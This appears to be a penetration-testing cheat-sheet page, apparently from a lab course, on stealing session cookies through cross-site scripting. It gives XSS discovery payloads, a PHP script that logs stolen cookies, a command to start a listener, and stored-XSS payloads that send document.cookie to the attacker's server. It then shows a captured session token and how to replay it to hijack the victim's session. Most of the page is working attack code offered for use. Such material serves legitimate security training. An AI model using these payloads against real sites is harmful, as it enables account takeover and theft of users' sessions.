OBTAINING SESSION COOKIES (PHP SERVER)

this script waits for anyone to request "?c=+document.cookie" and it will then parse the included cookie.

#discovery
root@oco:~$ BROWSER > {targetSite:port}
 input field 1: "><img src=x onerror=prompt(document.domain)>
 input field 2: "><img src=x onerror=confirm(1)>
 input field 3: "><img src=x onerror=alert(1)>

 * this will identify which field is vulnerable to XSS
 
 *  the document.domain is used to ensure that JavaScript is being executed on the 
    actual domain and not in a sandboxed environment. 
     - JavaScript being executed in a sandboxed environment prevents client-side 
       attacks, but there are sandbox escapes exists
       
 * if no automatic triggers occur, utilize the site/page button to trigger them
 
#check if HTTPOnly is "off" using Web Developer Tools
root@oco:~$ BROWSER > {targetSite:port} > F12 > Storage > Cookies > {targetSite}
 HttpOnly: False
 Secure: False
 SameSite: None

root@oco:~$ nano log.php
 <?php
  $logFile = "cookieLog.txt";
  $cookie = $_REQUEST["c"];

  $handle = fopen($logFile, "a");
  fwrite($handle, $cookie . "\n\n");
  fclose($handle);

  header("Location: http://www.google.com/");
  exit;
 ?>

root@oco:~$ php -S <VPN/TUN Adapter IP>:8000
 [Mon Mar  7 10:54:04 2022] PHP 7.4.21 Development Server (http://<VPN/TUN Adapter IP>:8000) started
 
 * A default PHP Server (such as this) or Netcat may not send data in the correct 
   form when the target web application utilizes HTTPS.
    - utilize the following in the real-world
       - XSSHunter, Burp Collaborator or Project Interactsh.  
 
root@oco:~$ BROWSER > {targetSite:port}
 vulnerable xss input field: <style>@keyframes x{}</style><video style="animation-name:x" onanimationend="window.location = 'http://<VPN/TUN Adapter IP>:8000/log.php?c=' + document.cookie;"></video>
 
 * another sample payload: <h1 onmouseover='document.write(`<img src="http://<VPN/TUN Adapter IP>:8000?cookie=${btoa(document.cookie)}">`)'>test</h1>

#expected victim actions
root@target:~$ BROWSER > New Private Window > {targetSite:port}
 * log in to the application
 
root@target:~$ BROWSER > http://xss.htb.net/profile?email=ela.stienen@example.com
 * view the public profile
    - this is the attacker-crafted public profile that hosts our cookie-stealing payload
    
root@oco:~$ phpServer...
 [Sat Mar 12 22:37:30 2022] 10.10.14.36:37104 [302]: GET /log.php?c=auth-session=s%3AQZOROUpdXh...
 
root@oco:~$ cat cookieLog.txt
 auth-session=s%3AQZOROUpdXh...
 
root@oco:~$ BROWSER > New Private Windows > {targetSite:port} > F12 > Storage > Cookies > {targetFQDN}
 Name: {auth-session}
 Value: {cookieValue}
 
 * refresh the target page to execute

PreviousBASIC XSS TESTS NextOBTAINING SESSION COOKIES (NETCAT SERVER)

Last updated 1 month ago